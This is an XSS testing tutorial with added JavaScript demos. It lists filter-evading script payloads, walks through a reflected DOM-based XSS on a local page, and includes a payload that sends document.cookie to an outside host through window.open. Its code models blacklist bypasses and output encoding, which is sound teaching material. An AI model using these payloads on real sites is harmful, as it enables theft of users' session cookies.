Security Testing: Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is one of the most common and most serious web vulnerabilities. It means that attacker-supplied script is injected into a page: if the application neither validates its input nor encodes its output, the script runs in the victim's browser with the privileges of the page, and the attacker can read the user's cookies and collect system and browser information. Stored XSS can additionally be used for phishing to harvest more user data.
The most common test for cross-site scripting is to enter
<script>alert(1)</script>
and its variants:
&lt;script&gt;alert(1)&lt;/script&gt; (HTML entity encoding)
%3Cscript%3Ealert(1)%3C/script%3E (URL encoding)
<scr<script>ipt>alert(1)</scr<script>ipt> (nested tag: a filter that strips the literal "<script>" once leaves a working tag behind)
<script x=1>alert(1)</script x=1> (tag with an attribute: a filter that matches only the bare "<script>" does not catch it)
<script>confirm(1)</script> (a different dialog function, for filters that block "alert")
javascript:alert(1) (a javascript: URL, for input that ends up in an href or src attribute)
If a dialog box appears after the input is submitted, the page has an XSS vulnerability. The variants are needed because the application may filter or encode the plain form while still letting one of the others through.
* Reflected XSS
The input is echoed back in the response and the browser executes it as code instead of displaying it as text, so you see the effect of your own code rather than the output the page was designed to produce.
For example, a page attrck.html with the following code:
<html><body>
<script>
document.write(location.search); // location.search is the part of the URL from the "?" onward
</script>
</body></html>
When you open the URL
http://127.0.0.1/attrck.html?search=222
the page displays "?search=222". If instead you open
http://127.0.0.1/attrck.html?search=<script>alert(1)</script>
the code that effectively runs on the page is
document.write("?search=<script>alert(1)</script>");
and a dialog box appears: the <script>alert(1)</script> written into the document is parsed and executed by the browser instead of being shown as the text after "?search=". (Browsers that follow the WHATWG URL standard percent-encode < and > in location.search, so on them this exact sink only fires if the page decodes the value first, for example with decodeURIComponent; the injection pattern is unchanged.)
A crafted URL can be used to steal the user's cookies. For example, add document.cookie = "name=123"; to the page above so that it sets a cookie, then construct the following URL, which sends the cookies of the 127.0.0.1 origin to a site of the attacker's choosing through the search parameter:
http://127.0.0.1/attrck.html?search=<script>window.open("http://www.baidu.com/s?wd="+document.cookie)</script>
The same-origin policy stops other origins from reading these cookies, but the injected script runs inside the vulnerable page, so the browser treats it as the 127.0.0.1 origin's own code: it can read document.cookie and carry the value out in the URL it opens.
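The payload list and the reflected-XSS walkthrough above, as an added example that is not code from the original article: the sink document.write(location.search) is modelled as a pure function so it runs in Node without a browser, and each payload variant is pushed through it, through a hypothetical naive blacklist filter introduced here to show why the variants exist, and through proper HTML output encoding (the fix). The names PAYLOADS, hasScriptTag, naiveBlacklist, escapeHtml and evaluate are this example's own; it assumes the page receives the query string undecoded, as the article's example does.

```javascript
// Added example, not code from the original article. Models the sink from the
// reflected-XSS walkthrough, document.write(location.search), as pure functions
// so it runs in Node, then reports for every payload variant whether an
// executable <script> tag survives the raw sink, a naive blacklist, the same
// blacklist applied before URL decoding, and proper HTML output encoding.

// Variants from the article's list. The nested and attribute forms defeat
// filters that strip a literal "<script>" once; the %-encoded form defeats
// filters that run before URL decoding.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '<SCRIPT>alert(1)</SCRIPT>',
  '%3Cscript%3Ealert(1)%3C/script%3E',
  '<scr<script>ipt>alert(1)</scr<script>ipt>',
  '<script x=1>alert(1)</script x=1>',
  '<script>confirm(1)</script>',
];

// The query string for http://127.0.0.1/attrck.html?search=<payload>.
// Assumption: the page gets the value undecoded, as in the article's example.
function searchFor(payload) {
  return '?search=' + payload;
}

// What document.write(location.search) puts into the DOM: the raw string, which
// the browser then parses as HTML. Same behaviour as the article's page.
function renderVulnerable(search) {
  return search;
}

// A hypothetical blacklist of the kind the variants bypass: strip the literal
// tag once, case-insensitively, and nothing else.
function naiveBlacklist(search) {
  return search.replace(/<script>/gi, '');
}

// The same blacklist run before URL decoding, a common ordering mistake.
function blacklistThenDecode(search) {
  return decodeURIComponent(naiveBlacklist(search));
}

// Contextual output encoding for an HTML text node: every character that can
// change the parser's state becomes an entity, so the payload is displayed,
// not executed. This is the fix for the article's example.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}
function renderSafe(search) {
  return escapeHtml(search);
}

// The check the tester does by eye (does a dialog appear?), done on the markup:
// walk the tags the way the HTML tokenizer does, where a tag name runs until
// whitespace, "/" or ">", and report whether an opening <script ...> exists.
// So "<scr<script>ipt>" is one unknown tag, not a script tag, until a filter
// strips the inner "<script>". (Attribute values containing ">" are not handled.)
function hasScriptTag(html) {
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    const close = html.indexOf('>', i);
    if (close === -1) return false;
    const tag = html.slice(i + 1, close);
    const name = tag.replace(/^\//, '').split(/[\s\/]/)[0].toLowerCase();
    if (!tag.startsWith('/') && name === 'script') return true;
    i = close + 1;
  }
  return false;
}

// Run one payload through each handler; true means the script would execute.
function evaluate(payload) {
  const search = searchFor(payload);
  return {
    payload,
    vulnerable: hasScriptTag(renderVulnerable(search)),
    blacklisted: hasScriptTag(naiveBlacklist(search)),
    blacklistThenDecode: hasScriptTag(blacklistThenDecode(search)),
    safe: hasScriptTag(renderSafe(search)),
  };
}

function report() {
  return PAYLOADS.map(evaluate);
}

console.table(report());
```

The table shows why a blacklist is the wrong tool: the plain and upper-case payloads are caught, but the nested tag is only turned into a working tag by the filter, the attribute form is never matched, and the percent-encoded form slips through when decoding happens after filtering. The safe column is false for every variant because the encoding is applied at the output, in the HTML text context where the value lands.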
* Stored XSS
The malicious code is stored on the server, for example in a published post or comment. Every other user who views that content executes the script in their own browser.
* DOM-based XSS
Strictly speaking this is also reflected XSS, but the payload is not written into the response by the server; it is placed into the page by client-side code that modifies the page's DOM (document object model). The example in this article is DOM based, since the page itself writes location.search into the document. Pages that pass untrusted data to DOM methods such as document.write, document.writeln and innerHTML are candidates for DOM-based XSS.
XSS vulnerabilities are usually found by manual input. Because the application may impose input restrictions, filtering and length limits, you need a range of input variants to get a meaningful test. Tools help here: Burp Suite, for example, lets you intercept a request, modify its parameters by hand and resubmit it to the browser. Remember that XSS is not limited to visible page inputs; hidden form fields and GET request parameters are injection points too.
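Helper logic for the testing approach described above, as an added example that is not code from the original article: collectInjectionPoints lists the parameters a tester must cover (GET query parameters plus hidden form fields), and classifyReflection reports how a probe string comes back in a response, so the "did a dialog appear" check becomes a repeatable verdict per parameter. The URL, form and response bodies are constructed samples for this demonstration, and the function names are this example's own.

```javascript
// Added example, not code from the original article: helpers for the manual or
// Burp-style testing described above. The URL, the form and the response bodies
// are constructed samples, not captured from any real site.

// The probe carries a unique token so the reflection can be located, followed by
// the characters an HTML text or attribute context must encode.
const TOKEN = 'xsst9q2';
const PROBE = TOKEN + '<">\'';

// Injection points: query-string parameter names from the URL and the names of
// hidden inputs in the page. Hidden fields are easy to miss because they never
// appear in the UI, yet they are submitted and often echoed back.
function collectInjectionPoints(url, html) {
  const params = [...new URL(url).searchParams.keys()];
  const hidden = [];
  const hiddenInput = /<input\b[^>]*\btype\s*=\s*["']?hidden["']?[^>]*>/gi;
  for (const m of html.matchAll(hiddenInput)) {
    const name = /\bname\s*=\s*["']?([^"'\s>]+)/i.exec(m[0]);
    if (name) hidden.push(name[1]);
  }
  return { params, hidden };
}

// How the probe came back. Every occurrence of the token is inspected and the
// worst one wins, because a value echoed safely in one place and raw in another
// (say, inside an inline script) is still exploitable.
//   raw          - "<" follows the token unencoded: likely exploitable
//   html-encoded - "<" became &lt; (or a numeric entity): output encoding present
//   url-encoded  - "<" became %3C: reflected inside a URL, try javascript: payloads
//   filtered     - token present but the special characters were removed or altered
//   absent       - this parameter is not reflected in this response
const RANK = { absent: 0, filtered: 1, 'url-encoded': 2, 'html-encoded': 3, raw: 4 };
function classifyReflection(body, token = TOKEN) {
  let verdict = 'absent';
  for (let i = body.indexOf(token); i !== -1; i = body.indexOf(token, i + token.length)) {
    const tail = body.slice(i + token.length, i + token.length + 8);
    let v = 'filtered';
    if (tail.startsWith('<')) v = 'raw';
    else if (/^(&lt;|&#0*60;|&#x0*3c;)/i.test(tail)) v = 'html-encoded';
    else if (/^%3c/i.test(tail)) v = 'url-encoded';
    if (RANK[v] > RANK[verdict]) verdict = v;
  }
  return verdict;
}

// Constructed test URL (probe in "search") and a constructed form with two hidden fields.
const SAMPLE_URL = 'http://127.0.0.1/attrck.html?search=' + encodeURIComponent(PROBE) + '&page=1';
const SAMPLE_FORM = `<form method="post" action="/profile">
  <input type="hidden" name="uid" value="42">
  <input name="display" value="">
  <input type=hidden name=csrf value="abc">
  <button>Save</button>
</form>`;

// Constructed responses to the same probe, one per outcome a tester may meet.
const SAMPLE_RESPONSES = {
  echoedRaw: `<div>Results for ${PROBE}</div>`,
  echoedEncoded: `<div>Results for ${TOKEN}&lt;&quot;&gt;&#x27;</div>`,
  inLink: `<a href="/s?q=${TOKEN}%3C%22%3E%27">next page</a>`,
  mixed: `<div>${TOKEN}&lt;&quot;&gt;&#39;</div><script>var q = "${PROBE}";</script>`,
  notEchoed: '<div>No results</div>',
};

// Enumerate the injection points, then classify each sample response.
function demo() {
  const points = collectInjectionPoints(SAMPLE_URL, SAMPLE_FORM);
  const verdicts = {};
  for (const [name, body] of Object.entries(SAMPLE_RESPONSES)) verdicts[name] = classifyReflection(body);
  return { points, verdicts };
}

console.log(JSON.stringify(demo(), null, 2));
```

In practice the probe is substituted into each parameter from collectInjectionPoints in turn (with Burp or a script) and the response body is fed to classifyReflection; only "raw" results need the article's executable payloads, while "html-encoded" and "url-encoded" tell you which encoding is in place and which payload class to try next.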